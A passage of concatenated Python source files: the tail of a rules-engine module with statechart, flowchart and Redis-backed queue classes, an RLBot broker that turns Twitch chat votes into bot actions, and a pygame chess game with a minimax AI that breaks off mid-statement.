self._definition = chart_definition
self._definition['$type'] = 'stateChart'
def _transform(self, parent_name, parent_triggers, parent_start_state, chart_definition, rules):
start_state = {}
reflexive_states = {}
for state_name, state in chart_definition.items():
qualified_name = state_name
if parent_name:
qualified_name = '{0}.{1}'.format(parent_name, state_name)
start_state[qualified_name] = True
for trigger_name, trigger in state.items():
if ('to' in trigger and trigger['to'] == state_name) or 'count' in trigger or 'cap' in trigger:
reflexive_states[qualified_name] = True
for state_name, state in chart_definition.items():
qualified_name = state_name
if parent_name:
qualified_name = '{0}.{1}'.format(parent_name, state_name)
triggers = {}
if parent_triggers:
for parent_trigger_name, trigger in parent_triggers.items():
triggers['{0}.{1}'.format(qualified_name, parent_trigger_name)] = trigger
for trigger_name, trigger in state.items():
if trigger_name != '$chart':
if ('to' in trigger) and parent_name:
trigger['to'] = '{0}.{1}'.format(parent_name, trigger['to'])
triggers['{0}.{1}'.format(qualified_name, trigger_name)] = trigger
if '$chart' in state:
self._transform(qualified_name, triggers, start_state, state['$chart'], rules)
else:
for trigger_name, trigger in triggers.items():
rule = {}
state_test = {'chart_context': {'$and':[{'label': qualified_name}, {'chart': 1}]}}
if 'pri' in trigger:
rule['pri'] = trigger['pri']
if 'count' in trigger:
rule['count'] = trigger['count']
if 'cap' in trigger:
rule['cap'] = trigger['cap']
if 'all' in trigger:
rule['all'] = list(trigger['all'])
rule['all'].append(state_test)
elif 'any' in trigger:
rule['all'] = [state_test, {'m$any': trigger['any']}]
else:
rule['all'] = [state_test]
if 'run' in trigger:
if isinstance(trigger['run'], str):
rule['run'] = Promise(self._host.get_action(trigger['run']))
elif isinstance(trigger['run'], Promise):
rule['run'] = trigger['run']
elif hasattr(trigger['run'], '__call__'):
rule['run'] = Promise(trigger['run'])
if 'to' in trigger:
from_state = None
if qualified_name in reflexive_states:
from_state = qualified_name
to_state = trigger['to']
assert_state = False
if to_state in reflexive_states:
assert_state = True
if 'run' in rule:
rule['run'].continue_with(To(from_state, to_state, assert_state))
else:
rule['run'] = To(from_state, to_state, assert_state)
if to_state in start_state:
del start_state[to_state]
if parent_start_state and to_state in parent_start_state:
del parent_start_state[to_state]
else:
raise Exception('Trigger {0} destination not defined'.format(trigger_name))
rules[trigger_name] = rule
started = False
for state_name in start_state.keys():
if started:
raise Exception('Chart {0} has more than one start state {1}'.format(self._name, state_name))
started = True
if parent_name:
rules[parent_name + '$start'] = {'all':[{'chart_context': {'$and': [{'label': parent_name}, {'chart':1}]}}], 'run': To(None, state_name, False)}
else:
rules['$start'] = {'all': [{'chart_context': {'$and': [{'$nex': {'running': 1}}, {'$s': 1}]}}], 'run': To(None, state_name, False)}
if not started:
raise Exception('Chart {0} has no start state'.format(self._name))
class Flowchart(Ruleset):
def __init__(self, name, host, chart_definition, state_cache_size):
self._name = name
self._host = host
ruleset_definition = {}
self._transform(chart_definition, ruleset_definition)
super(Flowchart, self).__init__(name, host, ruleset_definition, state_cache_size)
self._definition = chart_definition
self._definition['$type'] = 'flowChart'
def _transform(self, chart_definition, rules):
visited = {}
reflexive_stages = {}
for stage_name, stage in chart_definition.items():
if 'to' in stage:
if isinstance(stage['to'], str):
if stage['to'] == stage_name:
reflexive_stages[stage_name] = True
else:
for transition_name, transition in stage['to'].items():
if transition_name == stage_name or 'count' in transition or 'cap' in transition:
reflexive_stages[stage_name] = True
for stage_name, stage in chart_definition.items():
stage_test = {'chart_context': {'$and':[{'label': stage_name}, {'chart':1}]}}
from_stage = None
if stage_name in reflexive_stages:
from_stage = stage_name
if 'to' in stage:
if isinstance(stage['to'], str):
next_stage = None
rule = {'all': [stage_test]}
if stage['to'] in chart_definition:
next_stage = chart_definition[stage['to']]
else:
raise Exception('Stage {0} not found'.format(stage['to']))
assert_stage = False
if stage['to'] in reflexive_stages:
assert_stage = True
if not 'run' in next_stage:
rule['run'] = To(from_stage, stage['to'], assert_stage)
else:
if isinstance(next_stage['run'], str):
rule['run'] = To(from_stage, stage['to'], assert_stage).continue_with(Promise(self._host.get_action(next_stage['run'])))
elif isinstance(next_stage['run'], Promise) or hasattr(next_stage['run'], '__call__'):
rule['run'] = To(from_stage, stage['to'], assert_stage).continue_with(next_stage['run'])
rules['{0}.{1}'.format(stage_name, stage['to'])] = rule
visited[stage['to']] = True
else:
for transition_name, transition in stage['to'].items():
rule = {}
next_stage = None
if 'pri' in transition:
rule['pri'] = transition['pri']
if 'count' in transition:
rule['count'] = transition['count']
if 'cap' in transition:
rule['cap'] = transition['cap']
if 'all' in transition:
rule['all'] = list(transition['all'])
rule['all'].append(stage_test)
elif 'any' in transition:
rule['all'] = [stage_test, {'m$any': transition['any']}]
else:
rule['all'] = [stage_test]
if transition_name in chart_definition:
next_stage = chart_definition[transition_name]
else:
raise Exception('Stage {0} not found'.format(transition_name))
assert_stage = False
if transition_name in reflexive_stages:
assert_stage = True
if not 'run' in next_stage:
rule['run'] = To(from_stage, transition_name, assert_stage)
else:
if isinstance(next_stage['run'], str):
rule['run'] = To(from_stage, transition_name, assert_stage).continue_with(Promise(self._host.get_action(next_stage['run'])))
elif isinstance(next_stage['run'], Promise) or hasattr(next_stage['run'], '__call__'):
rule['run'] = To(from_stage, transition_name, assert_stage).continue_with(next_stage['run'])
rules['{0}.{1}'.format(stage_name, transition_name)] = rule
visited[transition_name] = True
started = False
for stage_name, stage in chart_definition.items():
if not stage_name in visited:
if started:
raise Exception('Chart {0} has more than one start state'.format(self._name))
rule = {'all': [{'chart_context': {'$and': [{'$nex': {'running': 1}}, {'$s': 1}]}}]}
if not 'run' in stage:
rule['run'] = To(None, stage_name, False)
else:
if isinstance(stage['run'], str):
rule['run'] = To(None, stage_name, False).continue_with(Promise(self._host.get_action(stage['run'])))
elif isinstance(stage['run'], Promise) or hasattr(stage['run'], '__call__'):
rule['run'] = To(None, stage_name, False).continue_with(stage['run'])
rules['$start.{0}'.format(stage_name)] = rule
started = True
class Host(object):
def __init__(self, ruleset_definitions = None, databases = None, state_cache_size = 1024):
if not databases:
databases = [{'host': 'localhost', 'port': 6379, 'password': None, 'db': 0}]
self._ruleset_directory = {}
self._ruleset_list = []
self._databases = databases
self._state_cache_size = state_cache_size
if ruleset_definitions:
self.register_rulesets(None, ruleset_definitions)
def get_action(self, action_name):
raise Exception('Action with name {0} not found'.format(action_name))
def load_ruleset(self, ruleset_name):
raise Exception('Ruleset with name {0} not found'.format(ruleset_name))
def save_ruleset(self, ruleset_name, ruleset_definition):
return
def get_ruleset(self, ruleset_name):
if ruleset_name in self._ruleset_directory:
return self._ruleset_directory[ruleset_name]
else:
ruleset_definition = self.load_ruleset(ruleset_name)
self.register_rulesets(None, ruleset_definition)
return self._ruleset_directory[ruleset_name]
def set_ruleset(self, ruleset_name, ruleset_definition):
self.register_rulesets(None, ruleset_definition)
self.save_ruleset(ruleset_name, ruleset_definition)
def get_state(self, ruleset_name, sid):
return self.get_ruleset(ruleset_name).get_state(sid)
def delete_state(self, ruleset_name, sid):
self.get_ruleset(ruleset_name).delete_state(sid)
def get_ruleset_state(self, ruleset_name, sid):
return self.get_ruleset(ruleset_name).get_state(sid)
def post_batch(self, ruleset_name, messages):
return self.get_ruleset(ruleset_name).assert_events(messages)
def start_post_batch(self, ruleset_name, messages):
return self.get_ruleset(ruleset_name).start_assert_events(messages)
def post(self, ruleset_name, message):
return self.get_ruleset(ruleset_name).assert_event(message)
def start_post(self, ruleset_name, message):
return self.get_ruleset(ruleset_name).start_assert_event(message)
def assert_fact(self, ruleset_name, fact):
return self.get_ruleset(ruleset_name).assert_fact(fact)
def start_assert_fact(self, ruleset_name, fact):
return self.get_ruleset(ruleset_name).start_assert_fact(fact)
def assert_facts(self, ruleset_name, facts):
return self.get_ruleset(ruleset_name).assert_facts(facts)
def start_assert_facts(self, ruleset_name, facts):
return self.get_ruleset(ruleset_name).start_assert_facts(facts)
def retract_fact(self, ruleset_name, fact):
return self.get_ruleset(ruleset_name).retract_fact(fact)
def start_retract_fact(self, ruleset_name, fact):
return self.get_ruleset(ruleset_name).start_retract_fact(fact)
def retract_facts(self, ruleset_name, facts):
return self.get_ruleset(ruleset_name).retract_facts(facts)
def start_retract_facts(self, ruleset_name, facts):
return self.get_ruleset(ruleset_name).start_retract_facts(facts)
def patch_state(self, ruleset_name, state):
return self.get_ruleset(ruleset_name).assert_state(state)
def renew_action_lease(self, ruleset_name, sid):
self.get_ruleset(ruleset_name).renew_action_lease(sid)
def register_rulesets(self, parent_name, ruleset_definitions):
print(ruleset_definitions)
rulesets = Ruleset.create_rulesets(parent_name, self, ruleset_definitions, self._state_cache_size)
for ruleset_name, ruleset in rulesets.items():
if ruleset_name in self._ruleset_directory:
raise Exception('Ruleset with name {0} already registered'.format(ruleset_name))
else:
self._ruleset_directory[ruleset_name] = ruleset
self._ruleset_list.append(ruleset)
ruleset.bind(self._databases)
return list(rulesets.keys())
def run(self):
def dispatch_ruleset(index, wait):
def callback(e, w):
inner_wait = wait
if e:
if str(e).find('306') == -1:
print('Exiting {0}'.format(str(e)))
os._exit(1)
elif not w:
inner_wait = False
if (index == (len(self._ruleset_list) -1)) and inner_wait:
self._d_timer = threading.Timer(0.25, dispatch_ruleset, ((index + 1) % len(self._ruleset_list), inner_wait, ))
self._d_timer.daemon = True
self._d_timer.start()
else:
self._d_timer = threading.Thread(target = dispatch_ruleset, args = ((index + 1) % len(self._ruleset_list), inner_wait, ))
self._d_timer.daemon = True
self._d_timer.start()
if not len(self._ruleset_list):
self._d_timer = threading.Timer(0.5, dispatch_ruleset, (0, False, ))
self._d_timer.daemon = True
self._d_timer.start()
else:
ruleset = self._ruleset_list[index]
if not index:
wait = True
ruleset.dispatch(callback)
def dispatch_timers(index, wait):
def callback(e, w):
inner_wait = wait
if e:
print('Error {0}'.format(str(e)))
elif not w:
inner_wait = False
if (index == (len(self._ruleset_list) -1)) and inner_wait:
self._t_timer = threading.Timer(0.25, dispatch_timers, ((index + 1) % len(self._ruleset_list), inner_wait, ))
self._t_timer.daemon = True
self._t_timer.start()
else:
self._t_timer = threading.Thread(target = dispatch_timers, args = ((index + 1) % len(self._ruleset_list), inner_wait, ))
self._t_timer.daemon = True
self._t_timer.start()
if not len(self._ruleset_list):
self._t_timer = threading.Timer(0.5, dispatch_timers, (0, False, ))
self._t_timer.daemon = True
self._t_timer.start()
else:
ruleset = self._ruleset_list[index]
if not index:
wait = True
ruleset.dispatch_timers(callback)
self._d_timer = threading.Timer(0.1, dispatch_ruleset, (0, False, ))
self._d_timer.daemon = True
self._d_timer.start()
self._t_timer = threading.Timer(0.1, dispatch_timers, (0, False, ))
self._t_timer.daemon = True
self._t_timer.start()
class Queue(object):
def __init__(self, ruleset_name, database = None, state_cache_size = 1024):
if not database:
database = {'host': 'localhost', 'port': 6379, 'password':None, 'db': 0}
self._ruleset_name = ruleset_name
self._handle = rules.create_client(state_cache_size, ruleset_name)
if isinstance(database, str):
rules.bind_ruleset(0, 0, database, None, self._handle)
else:
if not 'password' in database:
database['password'] = None
if not 'db' in database:
database['db'] = 0
rules.bind_ruleset(database['port'], database['db'], database['host'], database['password'], self._handle)
def isClosed(self):
return self._handle == 0
def post(self, message):
if self._handle == 0:
raise Exception('Queue has already been closed')
if 'sid' in message:
rules.queue_assert_event(self._handle, str(message['sid']), self._ruleset_name, json.dumps(message, ensure_ascii=False))
else:
rules.queue_assert_event(self._handle, None, self._ruleset_name, json.dumps(message, ensure_ascii=False))
def assert_fact(self, message):
if self._handle == 0:
raise Exception('Queue has already been closed')
if 'sid' in message:
rules.queue_assert_fact(self._handle, str(message['sid']), self._ruleset_name, json.dumps(message, ensure_ascii=False))
else:
rules.queue_assert_fact(self._handle, None, self._ruleset_name, json.dumps(message, ensure_ascii=False))
def retract_fact(self, message):
if self._handle == 0:
raise Exception('Queue has already been closed')
if 'sid' in message:
rules.queue_retract_fact(self._handle, str(message['sid']), self._ruleset_name, json.dumps(message, ensure_ascii=False))
else:
rules.queue_retract_fact(self._handle, None, self._ruleset_name, json.dumps(message, ensure_ascii=False))
def close(self):
if self._handle != 0:
rules.delete_client(self._handle)
self._handle = 0
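# Hedged usage sketch (not part of the original module): Queue is the lightweight
# client-side entry point. This assumes a Redis server on localhost:6379 and a
# ruleset named 'approval' registered elsewhere through a Host; both are
# illustrative placeholders.
# q = Queue('approval')
# q.post({'sid': 1, 'subject': 'request', 'amount': 100})   # queue an event
# q.assert_fact({'sid': 1, 'verified': True})               # queue a fact
# q.close()                                                 # release the handle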
|
twitch_broker.py
|
import json
import re
from dataclasses import dataclass, field
from pathlib import Path
from threading import Thread
from typing import List, Dict
from rlbot.agents.base_script import BaseScript
from rlbot.utils.game_state_util import GameState, GameInfoState
from rlbot_action_client import Configuration, ActionApi, ApiClient, ActionChoice
from twitchbroker.action_and_server_id import AvailableActionsAndServerId
from twitchbroker.overlay_data import OverlayData, serialize_for_overlay, generate_menu_id, generate_menu, \
CommandAcknowledgement, VoteTracker
from rlbot_twitch_broker_client.models.chat_line import ChatLine
from rlbot_twitch_broker_server import chat_buffer
from rlbot_twitch_broker_server import client_registry
from rlbot_twitch_broker_server.client_registry import ActionServerData
from rlbot_twitch_broker_server.run import find_usable_port, run_twitch_broker_server
from time import sleep
from twitchio import Message
from twitchio.ext.commands import Bot as TwitchBot
class AvailableActionAggregator:
def __init__(self):
self.action_apis: Dict[str, ActionApi] = {}
def make_action_api(self, client_data: ActionServerData):
bot_action_api_config = Configuration()
bot_action_api_config.host = client_data.base_url
return ActionApi(ApiClient(configuration=bot_action_api_config))
def fetch_all(self) -> List[AvailableActionsAndServerId]:
registry = client_registry.CLIENT_REGISTRY
request_threads = []
combined_actions: List[AvailableActionsAndServerId] = []
try:
for client in list(registry.clients.values()):
if client.base_url not in self.action_apis:
self.action_apis[client.get_key()] = self.make_action_api(client)
action_api = self.action_apis[client.get_key()]
request_threads.append((client.get_key(), action_api.get_actions_currently_available(
async_req=True, _request_timeout=0.2)))
for (client_key, req) in request_threads:
avail_actions_list = req.get()
combined_actions += [AvailableActionsAndServerId(a, client_key) for a in avail_actions_list]
except Exception as e:
print(e)
return combined_actions
def get_action_api(self, action_server_id):
return self.action_apis[action_server_id]
@dataclass
class TwitchAuth:
username: str
oauth: str
channel: str
class TwitchChatAdapter(TwitchBot):
def __init__(self, twitch_auth: TwitchAuth):
super().__init__(nick=twitch_auth.username, irc_token=twitch_auth.oauth, initial_channels=[twitch_auth.channel], prefix='!rlb')
async def event_message(self, message: Message):
chat_buffer.CHAT_BUFFER.enqueue_chat(ChatLine(username=message.author.display_name, message=message.content))
@dataclass
class MutableBrokerSettings:
num_old_menus_to_honor: int = 0
pause_on_menu: bool = False
play_time_between_pauses: int = 5
votes_needed: Dict[str, int] = field(default_factory=dict)
class TwitchBroker(BaseScript):
def __init__(self, overlay_folder: Path, twitch_auth: TwitchAuth, broker_settings: MutableBrokerSettings):
super().__init__('TwitchBroker')
self.json_file = overlay_folder / 'twitch_broker_overlay.json'
self.chat_buffer = chat_buffer.CHAT_BUFFER
self.menu_id = None
self.twitch_chat_adapter = None
self.broker_settings = broker_settings
self.vote_trackers: Dict[str, VoteTracker] = {}
self.recent_menus: List[OverlayData] = []
self.needs_new_menu = True
self.aggregator = AvailableActionAggregator()
self.recent_commands: List[CommandAcknowledgement] = []
self.stop_list = set()
self.command_count = 0
self.next_menu_moment: float = 0
if twitch_auth:
self.twitch_chat_adapter = TwitchChatAdapter(twitch_auth)
twitch_thread = Thread(target=self.twitch_chat_adapter.run)
twitch_thread.daemon = True
twitch_thread.start()
def write_json_for_overlay(self, overlay_data: OverlayData):
json_string = json.dumps(overlay_data, default=serialize_for_overlay)
self.json_file.write_text(json_string)
def run_loop_with_chat_buffer(self, desired_port: int):
port = find_usable_port(desired_port)
broker_server_thread = Thread(target=run_twitch_broker_server, args=(port,))
broker_server_thread.daemon = True
broker_server_thread.start()
client_registry.CLIENT_REGISTRY = client_registry.ActionServerRegistry()
while True:
self.get_game_tick_packet()
self.ensure_action_menu()
self.process_chat()
# self.make_passive_overlay_updates()
sleep(.1)
def ensure_action_menu(self):
if not self.needs_new_menu:
return
if not self.game_tick_packet.game_info.is_round_active:
if self.broker_settings.pause_on_menu:
# This seems like overkill, but we keep getting into annoying situations during replays.
self.set_game_state(GameState(game_info=GameInfoState(game_speed=1)))
return
if self.game_tick_packet.game_info.seconds_elapsed < self.next_menu_moment:
return
all_actions = self.aggregator.fetch_all()
self.menu_id = generate_menu_id()
overlay_data = generate_menu(all_actions, self.menu_id, self.recent_commands, self.game_tick_packet,
self.vote_trackers)
if overlay_data.num_actions() == 0:
return
if self.broker_settings.pause_on_menu:
self.set_game_state(GameState(game_info=GameInfoState(game_speed=0.01)))
self.write_json_for_overlay(overlay_data)
# TODO: consider notifying twitch chat of the new prefix via the bot for reduced round-trip latency
# TODO: also look into twitch extensions: https://dev.twitch.tv/extensions
self.recent_menus.insert(0, overlay_data)
if len(self.recent_menus) > self.broker_settings.num_old_menus_to_honor + 1:
killed_menu = self.recent_menus.pop()
expired_vote_tracker_keys = [key for key, tracker in self.vote_trackers.items() if tracker.original_menu_id == killed_menu.menu_id]
for expired_vt_key in expired_vote_tracker_keys:
self.vote_trackers.pop(expired_vt_key)
self.needs_new_menu = False
def process_chat(self):
if not self.game_tick_packet.game_info.is_round_active:
self.vote_trackers.clear()
return
if not self.chat_buffer.has_chat():
return
chat_line = self.chat_buffer.dequeue_chat()
text = chat_line.message
for menu_index, menu in enumerate(self.recent_menus):
match = re.search(menu.menu_id + '([0-9]+)', text, re.IGNORECASE)
if match is None:
continue
stop_string = f'{match.group(0)}{chat_line.username}'
if stop_string not in self.stop_list:
choice_num = int(match.group(1))
choice = menu.retrieve_choice(choice_num)
if not choice:
print(f"Invalid choice number {choice_num}")
continue
votes_needed_key = choice.entity_name.lower()
if votes_needed_key in self.broker_settings.votes_needed:
votes_needed = self.broker_settings.votes_needed[votes_needed_key]
if votes_needed > 1:
if choice.bot_action.description not in self.vote_trackers:
self.vote_trackers[choice.bot_action.description] = VoteTracker(votes_needed, menu.menu_id, [])
vote_tracker = self.vote_trackers[choice.bot_action.description]
vote_tracker.register_vote(chat_line.username)
self.write_json_for_overlay(self.recent_menus[0])
if not vote_tracker.has_needed_votes():
continue
# Vote successful! Clear out the vote tracker.
self.vote_trackers.pop(choice.bot_action.description)
action_api = self.aggregator.get_action_api(choice.action_server_id)
self.command_count += 1
try:
result = action_api.choose_action(
ActionChoice(action=choice.bot_action, entity_name=choice.entity_name))
status = "success" if result.code == 200 else "error"
description = choice.bot_action.description if result.code == 200 else result.reason
self.recent_commands.append(
CommandAcknowledgement(chat_line.username, description, status, str(self.command_count)))
if result.code == 200:
self.stop_list.add(stop_string)
except Exception as e:
self.recent_commands.append(
CommandAcknowledgement(chat_line.username, str(e), "error", str(self.command_count)))
print(e)
if len(self.recent_commands) > 10:
self.recent_commands.pop(0) # Get rid of the oldest command
# This causes the new command acknowledgement to get published. The overlay_data has an
# internal reference to recent_commands.
self.write_json_for_overlay(self.recent_menus[0])
if menu_index == 0:
self.needs_new_menu = True
if self.broker_settings.pause_on_menu:
self.set_game_state(GameState(game_info=GameInfoState(game_speed=1)))
self.next_menu_moment = self.game_tick_packet.game_info.seconds_elapsed + self.broker_settings.play_time_between_pauses
break
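# Hedged usage sketch (not part of the original script): one minimal way to stand
# up the broker. The credentials, overlay folder, vote threshold and port below
# are placeholders and must be replaced with real values.
# auth = TwitchAuth(username='my_bot', oauth='oauth:xxxxxxxx', channel='my_channel')
# settings = MutableBrokerSettings(pause_on_menu=True, votes_needed={'blue bot': 2})
# broker = TwitchBroker(Path('overlay'), auth, settings)
# broker.run_loop_with_chat_buffer(desired_port=8086)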
|
chess.py
|
from math import inf
import pygame_menu
import queue
import sys
import threading
import time
from board import *
from timer import Timer
# Initialize Pygame
pygame.init()
# Fonts
FONT = pygame.font.Font(pygame_menu.font.FONT_OPEN_SANS_BOLD, 18)
BIG_FONT = pygame.font.Font(pygame_menu.font.FONT_OPEN_SANS_BOLD, 26)
# Title and Icon
pygame.display.set_caption("ChessAI")
icon = pygame.image.load(os.path.join('img', 'icon.png'))
pygame.display.set_icon(icon)
class Game:
def __init__(self):
self.p1_name = "Player 1"
self.p2_name = "Minimax"
self.p1_timer = Timer(600, "bot")
self.p2_timer = Timer(600, "top")
self.p1_color = WHITE
self.p2_color = BLACK
self.ai_move = queue.Queue()
self.lock = threading.Lock()
self.board = Board(self.p1_color)
self.board.initialize_pieces()
self.menu_screen()
def reset(self):
"""
Resets board and makes changes to game state to prepare for new game
:return: None
"""
self.p2_name = "Minimax"
self.p1_timer.reset()
self.p2_timer.reset()
self.p1_color = WHITE
self.p2_color = BLACK
self.board = Board(self.p1_color)
self.board.initialize_pieces()
self.ai_move = queue.Queue()
def set_name(self, name):
"""
Sets name of human player
:param name: name of human player (str)
:return: None
"""
self.p1_name = name
def set_color(self, color, value):
"""
Sets color of human player
:param color: color selected by player (str)
:param value: RGB representation of color (tuple)
:return: None
"""
self.board.player = value
self.p1_color = value
if value == WHITE:
self.p2_color = BLACK
self.board.bottomPlayerTurn = False
else:
self.p2_color = WHITE
self.board.bottomPlayerTurn = True
self.board = Board(value)
self.board.initialize_pieces()
def set_ai(self, tup, value):
"""
Updates name of AI to correspond to underlying method of move choice
:param tup: tuple containing color as a string and as an RGB tuple (tuple)
:param value: numerical value representing AI (int)
:return: None
"""
self.p2_name = tup[0]
def menu_screen(self):
"""
Displays menu screen
:return: None
"""
theme = pygame_menu.themes.Theme(title_bar_style=pygame_menu.widgets.MENUBAR_STYLE_NONE,
menubar_close_button=False,
widget_font_color=SMALL_TEXT_COLOR,
background_color=BG_COLOR,
widget_font=pygame_menu.font.FONT_OPEN_SANS_BOLD,
cursor_color=WHITE)
menu = pygame_menu.Menu(height=SCREEN_HEIGHT, width=SCREEN_WIDTH, title="", theme=theme, menu_position=(50, 0))
menu.add_label("ChessAI", align=pygame_menu.locals.ALIGN_CENTER, font_name=pygame_menu.font.FONT_OPEN_SANS_BOLD,
font_color=LARGE_TEXT_COLOR, font_size=90, margin=(0, 50))
menu.add_text_input('Name : ', default=self.p1_name, maxchar=10, onchange=self.set_name)
menu.add_selector('Color : ', [('White', WHITE), ('Black', BLACK)], onchange=self.set_color)
menu.add_selector('AI : ', [('Minimax', 1), ('Random', 2)], onchange=self.set_ai)
menu.add_button('Play', self.game_screen)
menu.add_button('Quit', pygame_menu.events.EXIT)
menu.add_label("", align=pygame_menu.locals.ALIGN_CENTER, font_color=BLACK, font_size=70, margin=(0, 50))
menu.center_content()
# Keeps track of whether menu screen should keep running or stop
running = True
# Menu screen loop
while running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
exit()
menu.mainloop(SCREEN)
pygame.display.flip()
def determine_move(self):
"""
Determines move for AI and places move in thread-safe container (Queue)
:return: None
"""
# Determine move based on selected AI
if self.p2_name == "Minimax":
self.ai_move.put(AI.minimax(self.board.copy(), 3, inf, -inf, True, self.p2_color)[0])
else:
self.ai_move.put(AI.random_move(self.board))
# Close thread after move has been found
sys.exit()
def game_screen(self):
"""
Displays game screen
:return: None
"""
# Create clock to keep track of time
clock = pygame.time.Clock()
# Stores time passed since last frame (used to tick player timers)
dt = 0
# Create a thread which will be used to determine AI's move concurrently with rest of game
t = threading.Thread(target=self.determine_move)
# Keeps track of whether or not human player has resigned
p1_resigned = False
# Creates collision box for resign button
resign_button = pygame.Rect(BOARD_X + BOARD_SIZE + 8, BOARD_Y + BOARD_SIZE + 8,
int((TILE_SIZE * 4 + 8) / 2 - 4), 28)
# Game screen loop
while True:
for event in pygame.event.get():
# Pygame window was closed
if event.type == pygame.QUIT:
pygame.quit()
exit()
# Check if any buttons were pressed or pieces were selected
if event.type == pygame.MOUSEBUTTONDOWN:
self.board.select()
mouse_pos = event.pos
self.board.draw()
pygame.display.flip()
# Resign button was pressed
if resign_button.collidepoint(mouse_pos):
p1_resigned = True
# Draw background first (everything else goes on top of it)
SCREEN.fill(BG_COLOR)
# Decrement timer for player of current turn
if self.board.turn == self.p2_color:
self.p2_timer.tick(dt)
else:
self.p1_timer.tick(dt)
# Draw UI elements
self.draw_names()
self.draw_turn_indicator()
self.p1_timer.draw()
self.p2_timer.draw()
self.draw_resign_button()
# Check for endgame state
self.board.checkmate_stalemate()
self.board.insufficient_material()
# GAME OVER: Checkmate, Stalemate, or Insufficient Material
if self.board.gameover:
print("GAME OVER: ", self.board.gameover[0])
if self.board.gameover[0] == "Insufficient Material" or self.board.gameover[0] == "Stalemate":
return self.end_screen(self.board.gameover[0], None)
else:
if self.board.gameover[1] == self.board.player:
return self.end_screen(self.board.gameover[0], self.p1_name)
else:
return self.end_screen(self.board.gameover[0], self.p2_name)
# GAME OVER: Player 1 ran out of time
if self.p1_timer.time <= 0:
print("GAME OVER: Timeout")
return self.end_screen("Timeout", self.p2_name)
# GAME OVER: Player 2 ran out of time
if self.p2_timer.time <= 0:
print("GAME OVER: Timeout")
return self.end_screen("Timeout", self.p1_name)
# GAME OVER: Player 1 has resigned
if p1_resigned:
print("GAME OVER: Resignation")
return self.end_screen("Resignation", self.p2_name)
# Tell AI to determine move if...
# 1 - It is their turn
# 2 - They haven't found a move already
# 3 - The game is not over
# 4 - They aren't currently searching for a move (ensure 'determine_move' thread is not running)
self.lock.acquire()
if self.board.turn == self.p2_color \
and self.ai_move.qsize() == 0 \
and not self.board.gameover \
and not t.is_alive():
# Need to remake thread, since a thread can only be started once
t = threading.Thread(target=self.determine_move)
t.start()
self.lock.release()
# Tell AI to make their move if...
# 1 - It is their turn
# 2 - They found a move
# 3 - The game is not over
if self.board.turn == self.p2_color \
and self.ai_move.qsize() > 0 \
and not self.board.gameover:
move = self.ai_move.get()
self.board.make_move(move[0], move[1])
self.board.next_turn()
# Update time since last frame
dt = clock.tick(30) / 1000
# Draw all components of board
self.board.draw()
# Update display
pygame.display.flip()
# Self-play
# if self.board.turn == self.p1_color:
# move = AI.random_move(self.board)
# self.board.make_move(move[0], move[1])
# self.board.next_turn()
def end_screen(self, condition, winner=None):
"""
Displays end screen
:param condition: string representing win condition that ended the game (str)
:param winner: name of winner if applicable (str)
:return: None
"""
# Create background for end screen
bg = pygame.Rect(int(BOARD_X + TILE_SIZE * 2.5), int(BOARD_Y + TILE_SIZE * 2.5), TILE_SIZE * 3, TILE_SIZE * 2)
# Creates collision boxes for rematch and leave buttons
rematch_button = pygame.Rect(bg.left, bg.bottom - 28, bg.centerx - bg.left - 2, 28)
leave_button = pygame.Rect(bg.centerx + 2, bg.bottom - 28, bg.centerx - bg.left - 2, 28)
# Creates fade transitional effect for end screen
def fade(width, height):
f = pygame.Surface((width, height))
f.fill(BG_COLOR)
for alpha in range(0, 175):
f.set_alpha(alpha)
self.board.draw()
SCREEN.blit(f, (0, 0))
pygame.display.update()
pygame.time.delay(1)
# Controls fade effect
fading = True
# End screen loop
while True:
for event in pygame.event.get():
# Pygame window was closed
if event.type == pygame.QUIT:
pygame.quit()
exit()
# Check if any buttons were pressed
if event.type == pygame.MOUSEBUTTONDOWN:
mouse_pos = event.pos
# Rematch button was pressed
if rematch_button.collidepoint(mouse_pos):
self.reset()
return self.game_screen()
# Leave button was pressed
if leave_button.collidepoint(mouse_pos):
self.reset()
return self.menu_screen()
# Apply fade effect
if fading:
fade(SCREEN_WIDTH, SCREEN_HEIGHT)
fading = False
# Draw UI elements
self.draw_end_message(condition, winner)
# Update display
pygame.display.flip()
# Self-play
# time.sleep(1)
# self.reset()
# return self.game_screen()
def draw_names(self):
"""
Draws names for both players
:return: None
"""
# Draw top name (player 2)
pygame.draw.rect(SCREEN, BG_COLOR_LIGHT, [BOARD_X, BOARD_Y - 36, TILE_SIZE * 2, 28])
        p2_label = FONT.render(self.p2_name, True, SMALL_TEXT_COLOR)
        SCREEN.blit(p2_label, (BOARD_X + 4, BOARD_Y - 34))
# Draw bottom name (player 1)
pygame.draw.rect(SCREEN, BG_COLOR_LIGHT, [BOARD_X, BOARD_Y + BOARD_SIZE + 8, TILE_SIZE * 2, 28])
        p1_label = FONT.render(self.p1_name, True, SMALL_TEXT_COLOR)
        SCREEN.blit(p1_label, (BOARD_X + 4, BOARD_Y + BOARD_SIZE + 10))
def draw_turn_indicator(self):
"""
Draws turn indicator based on turn of current player in game screen
:return: None
"""
if self.board.turn == self.p1_color:
txt = FONT.render("YOUR TURN", True, LARGE_TEXT_COLOR)
SCREEN.blit(txt, (int(BOARD_X + TILE_SIZE * 3.5 + 8), BOARD_Y + BOARD_SIZE + 10))
else:
txt = FONT.render("AI is thinking...", True, LARGE_TEXT_COLOR)
SCREEN.blit(txt, (int(BOARD_X + TILE_SIZE * 3.5 + 8), BOARD_Y + BOARD_SIZE + 10))
@staticmethod
def draw_resign_button():
"""
Draws resign button in game screen
:return: None
"""
pygame.draw.rect(SCREEN, BG_COLOR_LIGHT, [BOARD_X + BOARD_SIZE + 8, BOARD_Y + BOARD_SIZE + 8,
int((TILE_SIZE * 4 + 8) / 2 - 4), 28])
txt = FONT.render("Resign", True, SMALL_TEXT_COLOR)
SCREEN.blit(txt, (BOARD_X + BOARD_SIZE + 40, BOARD_Y + BOARD_SIZE + 10))
@staticmethod
def draw_end_message(condition, winner):
"""
Draws end message in end screen
:param condition: string representing win condition that ended the game (str)
:param winner: name of winner if applicable (str)
:return: None
"""
# Draw 'Game Over' text
bg = pygame.draw.rect(SCREEN, BG_COLOR_LIGHT,
[int(BOARD_X + TILE_SIZE * 2.5), int(BOARD_Y + TILE_SIZE * 2.5), TILE_SIZE * 3,
TILE_SIZE * 2])
pygame.draw.rect(SCREEN, BLACK,
